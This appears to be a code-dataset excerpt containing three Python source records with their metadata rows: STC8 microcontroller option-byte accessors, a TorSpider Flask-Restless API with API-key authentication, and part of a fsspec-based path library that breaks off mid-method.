delays = {"short": 0, "long": 1}
if val not in delays.keys():
raise ValueError("must be one of %s" % list(delays.keys()))
self.msr[2] &= 0x7f
self.msr[2] |= delays[val] << 7
def get_p33_state(self):
return "high" if self.msr[2] & 0x08 else "low"
def set_p33_state(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xf7
self.msr[2] |= 0x08 if val else 0x00
def get_uart_passthrough(self):
return bool(self.msr[2] & 0x40)
def set_uart_passthrough(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xbf
self.msr[2] |= 0x40 if val else 0x00
def get_uart_pin_mode(self):
return "push-pull" if bool(self.msr[2] & 0x20) else "normal"
def set_uart_pin_mode(self, val):
delays = {"normal": 0, "push-pull": 1}
if val not in delays.keys():
raise ValueError("must be one of %s" % list(delays.keys()))
self.msr[2] &= 0xdf
self.msr[2] |= 0x20 if val else 0x00
def get_core_voltage(self):
if self.msr[4] == 0xea: return "low"
elif self.msr[4] == 0xf7: return "mid"
elif self.msr[4] == 0xfd: return "high"
return "unknown"
def set_core_voltage(self, val):
volt_vals = {"low": 0xea, "mid": 0xf7, "high": 0xfd}
if val not in volt_vals.keys():
raise ValueError("must be one of %s" % list(volt_vals.keys()))
self.msr[4] = volt_vals[val]
class Stc8Option(BaseOption):
def __init__(self, msr):
super().__init__()
assert len(msr) >= 5
self.msr = bytearray(msr)
self.options = (
("reset_pin_enabled", self.get_reset_pin_enabled, self.set_reset_pin_enabled),
("clock_gain", self.get_clock_gain, self.set_clock_gain),
("watchdog_por_enabled", self.get_watchdog, self.set_watchdog),
("watchdog_stop_idle", self.get_watchdog_idle, self.set_watchdog_idle),
("watchdog_prescale", self.get_watchdog_prescale, self.set_watchdog_prescale),
("low_voltage_reset", self.get_lvrs, self.set_lvrs),
("low_voltage_threshold", self.get_low_voltage, self.set_low_voltage),
("eeprom_erase_enabled", self.get_ee_erase, self.set_ee_erase),
("bsl_pindetect_enabled", self.get_pindetect, self.set_pindetect),
("por_reset_delay", self.get_por_delay, self.set_por_delay),
("rstout_por_state", self.get_p20_state, self.set_p20_state),
("uart1_remap", self.get_uart1_remap, self.set_uart1_remap),
("uart2_passthrough", self.get_uart_passthrough, self.set_uart_passthrough),
("uart2_pin_mode", self.get_uart_pin_mode, self.set_uart_pin_mode),
("epwm_open_drain", self.get_epwm_pp, self.set_epwm_pp),
("program_eeprom_split", self.get_flash_split, self.set_flash_split),
)
def get_reset_pin_enabled(self):
return not bool(self.msr[2] & 16)
def set_reset_pin_enabled(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xef
self.msr[2] |= 0x10 if not bool(val) else 0x00
def get_clock_gain(self):
gain = bool(self.msr[1] & 0x02)
return "high" if gain else "low"
def set_clock_gain(self, val):
gains = {"low": 0, "high": 1}
if val not in gains.keys():
raise ValueError("must be one of %s" % list(gains.keys()))
self.msr[1] &= 0xfd
self.msr[1] |= gains[val] << 1
def get_watchdog(self):
return not bool(self.msr[3] & 32)
def set_watchdog(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xdf
self.msr[3] |= 0x20 if not val else 0x00
def get_watchdog_idle(self):
return not bool(self.msr[3] & 8)
def set_watchdog_idle(self, val):
val = Utils.to_bool(val)
self.msr[3] &= 0xf7
self.msr[3] |= 0x08 if not val else 0x00
def get_watchdog_prescale(self):
return 2 ** (((self.msr[3]) & 0x07) + 1)
def set_watchdog_prescale(self, val):
val = Utils.to_int(val)
wd_vals = {2: 0, 4: 1, 8: 2, 16: 3, 32: 4, 64: 5, 128: 6, 256: 7}
if val not in wd_vals.keys():
raise ValueError("must be one of %s" % list(wd_vals.keys()))
self.msr[3] &= 0xf8
self.msr[3] |= wd_vals[val]
def get_lvrs(self):
return not bool(self.msr[2] & 64)
def set_lvrs(self, val):
val = Utils.to_bool(val)
self.msr[2] &= 0xbf
self.msr[2] |= 0x40 if not val else 0x00
def get_low_voltage(self):
return 3 - self.msr[2] & 0x03
def set_low_voltage(self, val):
val = Utils.to_int(val)
if val not in range(0, 4):
raise ValueError("must be one of %s" % list(range(0, 4)))
self.msr[2] &= 0xfc
self.msr[2] |= 3 - val
def get_ee_erase(self):
return bool(self.msr[0] & 2)
def set_ee_erase(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xfd
self.msr[0] |= 0x02 if val else 0x00
def get_pindetect(self):
return not bool(self.msr[0] & 1)
def set_pindetect(self, val):
val = Utils.to_bool(val)
self.msr[0] &= 0xfe
self.msr[0] |= 0x01 if not val else 0x00
def get_por_delay(self):
delay = bool(self.msr[1] & 128)
return "long" if delay else "short"
def set_por_delay(self, val):
delays = {"short": 0, "long": 1}
if val not in delays.keys():
raise ValueError("must be one of %s" % list(delays.keys()))
self.msr[1] &= 0x7f
self.msr[1] |= delays[val] << 7
def get_p20_state(self):
return "high" if self.msr[1] & 0x08 else "low"
def set_p20_state(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xf7
self.msr[1] |= 0x08 if val else 0x00
def get_uart_passthrough(self):
return bool(self.msr[1] & 0x10)
def set_uart_passthrough(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xef
self.msr[1] |= 0x10 if val else 0x00
def get_uart_pin_mode(self):
return "push-pull" if bool(self.msr[1] & 0x20) else "normal"
def set_uart_pin_mode(self, val):
modes = {"normal": 0, "push-pull": 1}
if val not in modes.keys():
raise ValueError("must be one of %s" % list(modes.keys()))
self.msr[1] &= 0xdf
self.msr[1] |= 0x20 if modes[val] else 0x00
def get_epwm_pp(self):
return bool(self.msr[1] & 0x04)
def set_epwm_pp(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xfb
self.msr[1] |= 0x04 if val else 0x00
def get_uart1_remap(self):
return bool(self.msr[1] & 0x40)
def set_uart1_remap(self, val):
val = Utils.to_bool(val)
self.msr[1] &= 0xbf
self.msr[1] |= 0x40 if val else 0x00
def get_flash_split(self):
return self.msr[4] * 256
def set_flash_split(self, val):
num_val = Utils.to_int(val)
if num_val < 512 or num_val > 65024 or (num_val % 512) != 0:
raise ValueError("must be between 512 and 65024 bytes and a multiple of 512 bytes")
self.msr[4] = num_val // 256
| 34.078382
| 97
| 0.595341
| 3,997
| 26,956
| 3.825369
| 0.071554
| 0.097973
| 0.030347
| 0.050033
| 0.800065
| 0.780052
| 0.766187
| 0.736364
| 0.727273
| 0.697384
| 0
| 0.049882
| 0.276376
| 26,956
| 791
| 98
| 34.078382
| 0.733979
| 0.05164
| 0
| 0.634391
| 0
| 0
| 0.076896
| 0.008339
| 0
| 0
| 0.028162
| 0
| 0.008347
| 1
| 0.24207
| false
| 0.010017
| 0.005008
| 0.09182
| 0.375626
| 0.006678
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
707e9174e4598650121da4b3696fd751e4aa8960
| 6,468
|
py
|
Python
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | 1
|
2018-02-23T08:08:59.000Z
|
2018-02-23T08:08:59.000Z
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | 16
|
2018-02-23T14:42:09.000Z
|
2018-04-05T03:38:32.000Z
|
app/api.py
|
TorSpider/TorSpider-Backend
|
a4f22293747153fe03bac37920b4fc444db3f167
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_restless import ProcessingException
from flask_restless_swagger import SwagAPIManager as APIManager
from app import app, db
from app.models import Onions, Urls, Pages, Forms, Links, Nodes
from flask import request
# Flask- Restless
manager = APIManager(app, flask_sqlalchemy_db=db)
# Define the different pre_processors to limit API access
def authenticated_preprocessor(search_params=None, **kwargs):
"""
Authenticates the api key from the spiders against the nodes table.
Also authenticates the front-end
"""
auth = request.headers.get('Authorization', '').lower()
node = request.headers.get('Authorization-Node', '').lower()
try:
type_, api_key = auth.split(None, 1)
if type_ != 'token':
# invalid Authorization scheme
raise ProcessingException(description='Not Authorized', code=401)
my_auth = Nodes.query.filter(Nodes.api_key == api_key, Nodes.unique_id == node, Nodes.active == True).first()
if my_auth:
# Valid api key
return True
else:
# Token/Node combo is not valid.
raise ProcessingException(description='Not Authorized', code=401)
except (ValueError, KeyError):
# split failures or API key not valid
raise ProcessingException(description='Not Authorized', code=401)
def authenticated_frontent_only_preprocessor(search_params=None, **kwargs):
"""
Authenticates the api key from the spiders against the nodes table.
Also authenticates the front-end
"""
auth = request.headers.get('Authorization', '').lower()
node = request.headers.get('Authorization-Node', '').lower()
frontend_node = db.session.query(Nodes.unique_id).filter(Nodes.owner == 'FrontEnd').first()
if frontend_node:
frontend_node = frontend_node.unique_id
if node != frontend_node:
# Won't serve if not frontend
raise ProcessingException(description='Not Authorized', code=401)
try:
type_, api_key = auth.split(None, 1)
if type_ != 'token':
# invalid Authorization scheme
raise ProcessingException(description='Not Authorized', code=401)
my_auth = Nodes.query.filter(Nodes.api_key == api_key, Nodes.unique_id == node, Nodes.active == True).first()
if my_auth:
# Valid api key
return True
else:
# Token/Node combo is not valid.
raise ProcessingException(description='Not Authorized', code=401)
except (ValueError, KeyError):
# split failures or API key not valid
raise ProcessingException(description='Not Authorized', code=401)
# Endpoints available at /api/<table_name>
manager.create_api(Onions, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
allow_patch_many=True, allow_functions=True,
preprocessors=dict(GET_SINGLE=[authenticated_preprocessor],
GET_MANY=[authenticated_preprocessor],
POST=[authenticated_preprocessor],
PUT=[authenticated_preprocessor],
PATCH=[authenticated_preprocessor],
DELETE=[authenticated_preprocessor]))
manager.create_api(Urls, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
allow_patch_many=True, allow_functions=True,
preprocessors=dict(GET_SINGLE=[authenticated_preprocessor],
GET_MANY=[authenticated_preprocessor],
POST=[authenticated_preprocessor],
PUT=[authenticated_preprocessor],
PATCH=[authenticated_preprocessor],
DELETE=[authenticated_preprocessor]))
manager.create_api(Pages, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
allow_patch_many=True, allow_functions=True,
preprocessors=dict(GET_SINGLE=[authenticated_preprocessor],
GET_MANY=[authenticated_preprocessor],
POST=[authenticated_preprocessor],
PUT=[authenticated_preprocessor],
PATCH=[authenticated_preprocessor],
DELETE=[authenticated_preprocessor]))
manager.create_api(Forms, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
allow_patch_many=True, allow_functions=True,
preprocessors=dict(GET_SINGLE=[authenticated_preprocessor],
GET_MANY=[authenticated_preprocessor],
POST=[authenticated_preprocessor],
PUT=[authenticated_preprocessor],
PATCH=[authenticated_preprocessor],
DELETE=[authenticated_preprocessor]))
manager.create_api(Links, methods=['POST', 'GET', 'PUT', 'PATCH'], results_per_page=100,
allow_patch_many=True, allow_functions=True,
preprocessors=dict(GET_SINGLE=[authenticated_preprocessor],
GET_MANY=[authenticated_preprocessor],
POST=[authenticated_preprocessor],
PUT=[authenticated_preprocessor],
PATCH=[authenticated_preprocessor],
DELETE=[authenticated_preprocessor]))
manager.create_api(Nodes, methods=['POST', 'GET', 'PUT', 'PATCH', 'DELETE'], results_per_page=100,
allow_patch_many=True, allow_functions=True, allow_delete_many=True,
preprocessors=dict(GET_SINGLE=[authenticated_frontent_only_preprocessor],
GET_MANY=[authenticated_frontent_only_preprocessor],
POST=[authenticated_frontent_only_preprocessor],
PUT=[authenticated_frontent_only_preprocessor],
PATCH=[authenticated_frontent_only_preprocessor],
DELETE=[authenticated_frontent_only_preprocessor]))
| 53.016393
| 117
| 0.589672
| 594
| 6,468
| 6.195286
| 0.186869
| 0.210598
| 0.066576
| 0.072283
| 0.777989
| 0.772011
| 0.760326
| 0.74538
| 0.74538
| 0.74538
| 0
| 0.009342
| 0.321429
| 6,468
| 121
| 118
| 53.454545
| 0.829118
| 0.087044
| 0
| 0.712644
| 0
| 0
| 0.046798
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022989
| false
| 0
| 0.057471
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
563f4f60f902bafd85823be54aa6c6329fdb674b
| 52,455
|
py
|
Python
|
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | 2
|
2021-12-02T00:13:16.000Z
|
2022-02-26T11:18:33.000Z
|
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | null | null | null |
lazy/io/pathz/core.py
|
trisongz/lazycls
|
701bad1a358ed3bb136347d0c5eb81de3201f6a3
|
[
"MIT"
] | null | null | null |
import os
import typing
import ntpath
import pathlib
import posixpath
from importlib import import_module
from typing import Any, ClassVar, Iterator, Optional, Type, TypeVar, Union, Callable, List, TYPE_CHECKING
from lazy.libz import Lib
from . import types
from . import base
_P = TypeVar('_P')
URI_PREFIXES = ('gs://', 's3://', 'minio://', 's3compat://')
_URI_SCHEMES = frozenset(('gs', 's3', 'minio', 's3compat'))
_URI_MAP_ROOT = {
'gs://': '/gs/',
's3://': '/s3/',
'minio://': '/minio/',
's3compat://': '/s3compat/'
}
_PROVIDER_MAP = {
'gs': 'GoogleCloudStorage',
's3': 'AmazonS3',
'minio': 'MinIO',
's3compat': 'S3Compatible'
}
PathLike = types.PathLike
ReadOnlyPath = base.ReadOnlyPath
ReadWritePath = base.ReadWritePath
PathLikeCls = Union[Type[ReadOnlyPath], Type[ReadWritePath]]
class _IOPath(pathlib.PurePath, ReadWritePath):
"""Pathlib-like API around `fsspec` providing Async Capabilities"""
_PATH: ClassVar[types.ModuleType]
_FSX: ClassVar[types.ModuleType] = None
_FSX_LIB: str = None
_FSX_MODULE: Optional[str] = None
_FSX_CLS: Optional[str] = None
_SYNC_FS: ClassVar[types.ModuleType] = None
_ASYNC_FS: ClassVar[types.ModuleType] = None
@classmethod
def _ensure_lib(cls, *args, **kwargs):
if cls._FSX is not None: return
cls._FSX = Lib.import_lib(cls._FSX_LIB)
if cls._FSX_MODULE: cls._FSX = import_module(cls._FSX_MODULE, package=cls._FSX_LIB)
#cls._FSX = Lib.import_lib(cls._FSX_LIB)
@classmethod
def get_filesystem(cls, is_async: bool = False, *args, **kwargs):
cls._ensure_lib()
if is_async and cls._ASYNC_FS: return cls._ASYNC_FS
if cls._SYNC_FS: return cls._SYNC_FS
authz = cls.get_configz(*args, **kwargs)
if is_async:
cls._ASYNC_FS = getattr(cls._FSX, cls._FSX_CLS)(asynchronous = True, **authz)
return cls._ASYNC_FS
cls._SYNC_FS = getattr(cls._FSX, cls._FSX_CLS)(**authz)
return cls._SYNC_FS
@classmethod
def get_configz(cls, *args, **kwargs):
return {}
@property
def async_fs(self) :
if not self._ASYNC_FS:
self.get_filesystem(is_async=True)
return self._ASYNC_FS
@property
def sync_fs(self):
if not self._SYNC_FS:
self.get_filesystem()
return self._SYNC_FS
def __new__(cls: Type[_P], *parts: types.PathLike) -> _P:
full_path = '/'.join(os.fspath(p) for p in parts)
if not full_path.startswith(URI_PREFIXES): return super().__new__(cls, *parts)
prefix = full_path[:5]
new_prefix = _URI_MAP_ROOT[prefix]
return super().__new__(cls, full_path.replace(prefix, new_prefix, 1))
def _new(self: _P, *parts: types.PathLike) -> _P:
"""Create a new `Path` child of same type."""
return type(self)(*parts)
@property
def _uri_scheme(self) -> Optional[str]:
if (len(self.parts) >= 2 and self.parts[0] == '/' and self.parts[1] in _URI_SCHEMES): return self.parts[1]
else: return None
def get_bucket(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket with optional prefix
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
if prefix: return f'{uri_scheme}://' + parts[0]
return parts[0]
def get_bucket_path(self, prefix: bool = True) -> Optional[str]:
"""
Returns the root bucket + path with optional prefix
removes the versioning
"""
if not self.is_cloud: return None
parts = self.split_path()
uri_scheme = self._uri_scheme
p = '/'.join(parts[:2])
if prefix: return f'{uri_scheme}://' + p
return p
@property
def bucket(self) -> Optional[str]:
if self._uri_scheme: return self._PATH.join(f'{self._uri_scheme}://', self.parts[3])
return None
@property
def bucket_path(self) -> Optional[str]:
if self._uri_scheme: return self._PATH.join(*self.parts[3:])
return None
@property
def _path_str(self) -> str:
"""
Returns the `__fspath__` string representation.
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(f'{uri_scheme}://', *self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
@property
def string(self) -> str:
"""
Returns the extension for a file
"""
return self._path_str
@property
def _filename_str(self) -> str:
"""
Returns the filename if is file, else ''
"""
if self.is_file(): return self.parts[-1]
return ''
@property
def extension(self) -> str:
"""
Returns the extension for a file
"""
return self.suffix
@property
def _cpath_str(self) -> str:
"""
Returns the `__fspath__` string representation without the uri_scheme
"""
uri_scheme = self._uri_scheme
if uri_scheme: return self._PATH.join(*self.parts[2:])
else: return self._PATH.join(*self.parts) if self.parts else '.'
def __fspath__(self) -> str:
return self._path_str
def __str__(self) -> str: # pylint: disable=invalid-str-returned
return self._path_str
def __repr__(self) -> str:
return f'{type(self).__name__}({self._path_str!r})'
def expanduser(self: _P) -> _P:
"""
Returns a new path with expanded `~` and `~user` constructs.
"""
return self._new(self._PATH.expanduser(self._path_str))
def resolve(self: _P, strict: bool = False) -> _P:
"""
Returns the abolute path.
"""
if self.is_cloud: return self._new(self.as_posix())
return self._new(self._PATH.abspath(self._path_str))
def copydir(self: _P, dst: base.PathLike, ignore=['.git'], overwrite: bool = False, dryrun: bool = False):
"""
Copies the Current Top Level Parent Dir to the Dst Dir without recursion
"""
dst = self._new(dst)
assert dst.is_dir(), 'Destination is not a valid directory'
if not dryrun: dst.ensure_dir()
copied_files = []
fnames = self.listdir(ignore=ignore)
curdir = self.absolute_parent
for fname in fnames:
dest_path = dst.joinpath(fname.relative_to(curdir))
if not dryrun: fname.copy(dest_path, overwrite=overwrite, skip_errors=True)
copied_files.append(dest_path)
return copied_files
def copydirs(self: _P, dst: base.PathLike, mode: str = 'shallow', pattern='*', ignore=['.git'], overwrite: bool = False, levels: int = 2, dryrun: bool = False):
"""Copies the Current Parent Dir to the Dst Dir.
modes = [shallow for top level recursive. recursive for all nested]
levels = number of recursive levels
dryrun = returns all files that would have been copied without copying
"""
assert mode in {'shallow', 'recursive'}, 'Invalid Mode Option: [shallow, recursive]'
dst = self._new(dst)
assert dst.is_dir(), 'Destination is not a valid directory'
levels = max(1, levels)
dst.ensure_dir()
curdir = self.absolute_parent
copied_files = []
if levels > 1 and mode == 'recursive' and '/' not in pattern:
for _ in range(1, levels): pattern += '/*'
if self.is_dir() and not pattern.startswith('/'): pattern = '*/' + pattern
fiter = curdir.glob(pattern) if mode == 'shallow' else curdir.rglob(pattern)
fnames = [f for f in fiter if not bool(set(f.parts).intersection(ignore))]
for f in fnames:
dest_path = dst.joinpath(f.relative_to(curdir))
if not dryrun:
if f.is_dir(): dest_path.ensure_dir()
else: f.copy(dest_path, overwrite=overwrite, skip_errors=True)
copied_files.append(dest_path)
return copied_files
def listdir(self: _P, ignore=['.git'], skip_dirs=True, skip_files=False):
fnames = [f for f in self.iterdir() if not bool(set(f.parts).intersection(ignore))]
fnames = [f.resolve() for f in fnames]
if skip_dirs:
return [f for f in fnames if f.is_file()]
if skip_files:
return [f for f in fnames if f.is_dir()]
return fnames
def listdirs(self: _P, mode: str = 'shallow', pattern='*', ignore=['.git'], skip_dirs=True, skip_files=False, levels: int = 2):
"""Lists all files in current parent dir
modes = [shallow for top level recursive. recursive for all nested]
"""
assert mode in {'shallow', 'recursive'}, 'Invalid Mode Option: [shallow, recursive]'
curdir = self.absolute_parent
levels = max(1, levels)
if levels > 1 and mode == 'recursive' and '/' not in pattern:
for _ in range(1, levels): pattern += '/*'
if self.is_dir() and not pattern.startswith('*/'): pattern = '*/' + pattern
fiter = curdir.glob(pattern) if mode == 'shallow' else curdir.rglob(pattern)
fnames = [f for f in fiter if not bool(set(f.parts).intersection(ignore))]
if skip_dirs: return [f for f in fnames if f.is_file()]
if skip_files: return [f for f in fnames if f.is_dir()]
return list(fnames)
def ensure_dir(self: _P, mode: int = 0o777, parents: bool = True, exist_ok: bool = True):
"""Ensures the parent directory exists, creates if not"""
return self.absolute_parent.mkdir(mode=mode, parents=parents, exist_ok=exist_ok)
def _get_dest(self: _P, dest: base.PathLike, recursive: bool = False, overwrite: bool = False, skip_errors: bool = False):
"""
Validates the Destination
"""
_dest = self._new(dest)
if self.is_dir() and recursive: return _dest
if _dest.is_dir(): _dest = _dest.joinpath(self._filename_str)
if _dest.exists() and not overwrite:
if skip_errors: return _dest
raise ValueError(f'{_dest.as_posix()} exists and overwrite = False')
return _dest
@property
def absolute_parent(self) -> _P:
uri_scheme = self._uri_scheme
if uri_scheme: return self._new(self._PATH.join(f'{uri_scheme}://', '/'.join(self.parts[2:-1])))
p = self.resolve()
if p.is_dir(): return p
return p.parent
@property
def is_cloud(self) -> bool:
return bool(self._uri_scheme)
@property
def cloud_provider(self) -> Optional[str]:
return _PROVIDER_MAP.get(self._uri_scheme, None)
@property
def provider(self) -> Optional[str]:
return _PROVIDER_MAP.get(self._uri_scheme, 'Local')
@property
def bucket(self) -> Optional[str]:
raise NotImplementedError
@property
def bucket_path(self) -> Optional[str]:
raise NotImplementedError
@property
def is_cloud(self) -> bool:
return bool(self._uri_scheme)
@property
def is_gs(self) -> bool:
return bool(self._uri_scheme == 'gs')
@property
def is_s3(self) -> bool:
return bool(self._uri_scheme == 's3')
@property
def is_minio(self) -> bool:
return bool(self._uri_scheme == 'minio')
def exists(self) -> bool:
"""
Returns True if self exists.
"""
raise NotImplementedError
def is_dir(self) -> bool:
"""
Returns True if self is a directory.
"""
raise NotImplementedError
def is_file(self) -> bool:
"""
Returns True if self is a file.
"""
raise NotImplementedError
def cat(self: _P, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
raise NotImplementedError
def cat_file(self: _P, start: Optional[int] = None, end: Optional[int] = None, **kwargs):
"""
Get the content of a file
"""
raise NotImplementedError
def copy(self: _P, dest: base.PathLike, overwrite: bool = False, skip_errors: bool = False) -> _P:
"""
Copies the File to the Dir/File.
"""
raise NotImplementedError
def download(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) to local.
"""
raise NotImplementedError
def du(self: _P, total: Optional[int] = None, maxdepth: Optional[int] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
raise NotImplementedError
def find(self: _P, maxdepth: Optional[int] = None, withdirs: bool = False, detail: bool = False, prefix: Optional[str] = None, **kwargs):
"""
List all files below path.
"""
raise NotImplementedError
def get_checksum(self: _P, refresh: bool = False, **kwargs):
"""
Unique value for current version of file
"""
raise NotImplementedError
def get_file(self: _P, dest: base.PathLike, callback: Optional[Callable] = None, **kwargs):
"""
Copy single remote file to local
"""
raise NotImplementedError
def get_files(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) to local.
"""
raise NotImplementedError
def glob(self: _P, pattern: str) -> Iterator[_P]:
"""
Yielding all matching files (of any kind).
"""
raise NotImplementedError
def head(self: _P, size: Optional[int] = None):
"""
Get the first size bytes from file
"""
raise NotImplementedError
def iterdir(self: _P) -> Iterator[_P]:
"""
Iterates over the directory.
"""
raise NotImplementedError
def get_modified(self: _P, version_id: str = None, refresh: bool = False, **kwargs):
"""
Return the last modified timestamp of file at path as a datetime
"""
raise NotImplementedError
def ls(self: _P, detail: bool = False, **kwargs):
"""
List objects at path.
"""
raise NotImplementedError
def mkdir(self: _P, mode: int = 0o777, parents: bool = False, exist_ok: bool = False) -> None:
"""
Create a new directory at this given path.
"""
raise NotImplementedError
def move(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Move file(s) from one location to another
"""
raise NotImplementedError
def mv(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Move file(s) from one location to another
"""
raise NotImplementedError
def open(self: _P, mode: str = 'r', encoding: Optional[str] = base.DEFAULT_ENCODING, errors: Optional[str] = None, **kwargs: Any) -> typing.IO[Union[str, bytes]]:
"""Opens the file."""
raise NotImplementedError
def put_file(self: _P, dest: base.PathLike, callback: Optional[Callable] = None, **kwargs):
"""
Copy file from local.
"""
raise NotImplementedError
def put_files(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) from local.
"""
raise NotImplementedError
def remove(self: _P, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
raise NotImplementedError
def rename(self: _P, dest: base.PathLike, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Rename file or directory to the given target.
"""
raise NotImplementedError
def replace(self: _P, target: base.PathLike) -> _P:
"""
Replace file or directory to the given target.
"""
raise NotImplementedError
def rm(self: _P, recursive: bool = False, maxdepth: Optional[int] = None, **kwargs):
"""
Delete files.
"""
raise NotImplementedError
def rm_file(self: _P, missing_ok: bool = True, **kwargs):
"""
Delete a file
"""
raise NotImplementedError
def rmdir(self: _P, force: bool = False) -> None:
"""
Remove the empty directory.
"""
raise NotImplementedError
def rmtree(self: _P) -> None:
"""
Remove the directory.
"""
raise NotImplementedError
def sign(self: _P, expiration: int = 100, **kwargs):
"""
Create a signed URL representing the given path
Some implementations allow temporary URLs to be generated, as a way of delegating credentials
"""
raise NotImplementedError
def split_path(self: _P, **kwargs) -> List[str]:
"""
Normalise path string into bucket and key
"""
raise NotImplementedError
def tail(self: _P, size: Optional[int] = None):
"""
Get the last size bytes from file
"""
raise NotImplementedError
def touch(self: _P, truncate: bool = True, data = None, **kwargs):
"""
Create empty file or truncate
"""
raise NotImplementedError
def unlink(self: _P, missing_ok: bool = True) -> None:
"""
Remove this file or symbolic link.
"""
raise NotImplementedError
def url(self: _P, expires: int = 3600, client_method: str = 'get_object', **kwargs):
"""
Generate presigned URL to access path by HTTP
"""
raise NotImplementedError
def upload(self: _P, dest: base.PathLike, recursive: bool = False, callback: Optional[Callable] = None, **kwargs):
"""
Copy file(s) from local.
"""
raise NotImplementedError
@property
def checksum(self):
"""
Unique value for current version of file without refreshing
"""
return self.get_checksum()
@property
def created(self):
"""
Return the created timestamp of a file as a datetime
"""
return self.get_checksum()
@property
def exist(self) -> bool:
"""
Returns True if self exists.
"""
return self.exists()
@property
def info(self):
"""
Give details of entry at path
"""
raise NotImplementedError
@property
def isdir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.is_dir()
@property
def isfile(self) -> bool:
"""
Returns True if self is a file.
"""
return self.is_file()
@property
def modified(self):
"""
Return the last modified timestamp of file at path as a datetime without refreshing
"""
return self.get_modified()
@property
def size(self: _P):
"""
Size in bytes of file
"""
raise NotImplementedError
@property
def stat(self: _P):
"""
Give details of entry at path
"""
raise NotImplementedError
@property
def home(self):
"""
Returns the home directory
"""
if self.is_cloud: return self._new(self.get_bucket(True))
p = os.path.expanduser('~')
return self._new(p)
@property
def userdir(self):
return self.home
import upath
from fsspec.asyn import AsyncFileSystem
from fsspec.implementations.local import LocalFileSystem
class AsyncFSx(AsyncFileSystem, LocalFileSystem):
pass
class PosixFSxPath(_IOPath, pathlib.PurePosixPath):
"""
Pathlib-like API around `fsspec` providing Async Capabilities
"""
_PATH = posixpath
_FSX: 'LocalFileSystem' = None
_SYNC_FS: 'LocalFileSystem' = None
_ASYNC_FS: 'LocalFileSystem' = None
_FSX_LIB: str = 'fsspec'
_FSX_MODULE: Optional[str] = 'fsspec.implementations.local'
_FSX_CLS: str = 'LocalFileSystem'
@classmethod
def _get_filesystem(cls, is_async: bool = False, *args, **kwargs):
cls._ensure_lib()
if is_async and cls._ASYNC_FS: return cls._ASYNC_FS
if cls._SYNC_FS: return cls._SYNC_FS
# remove this since we will have it be for sure available.
#from fsspec.implementations.local import LocalFileSystem
if is_async:
cls._ASYNC_FS = AsyncFSx(asynchronous = True)
return cls._ASYNC_FS
cls._SYNC_FS = LocalFileSystem()
return cls._SYNC_FS
@property
def async_fs(self) -> 'AsyncFSx':
if not self._ASYNC_FS: self._get_filesystem(is_async=True)
return self._ASYNC_FS
@property
def sync_fs(self) -> 'LocalFileSystem':
if not self._SYNC_FS: self._get_filesystem()
return self._SYNC_FS
@classmethod
def get_configz(cls, *args, **kwargs):
return {}
def exists(self) -> bool:
"""
Returns True if self exists.
"""
return self.sync_fs.exists(self._cpath_str)
def expand_path(self, recursive: bool = False, maxdepth: Optional[int] = None):
"""
Turn one or more globs or directories into a list of all matching paths to files or directories.
"""
paths = self.sync_fs.expand_path(recursive = recursive, maxdepth = maxdepth)
return [self._new(p) for p in paths]
def is_dir(self) -> bool:
"""
Returns True if self is a directory.
"""
return self.sync_fs.isdir(self._cpath_str)
def is_file(self) -> bool:
"""Returns True if self is a file."""
return self.sync_fs.isfile(self._cpath_str)
def cat(self, recursive: bool = False, on_error: Optional[str] = None, **kwargs):
"""
Fetch (potentially multiple) paths contents
"""
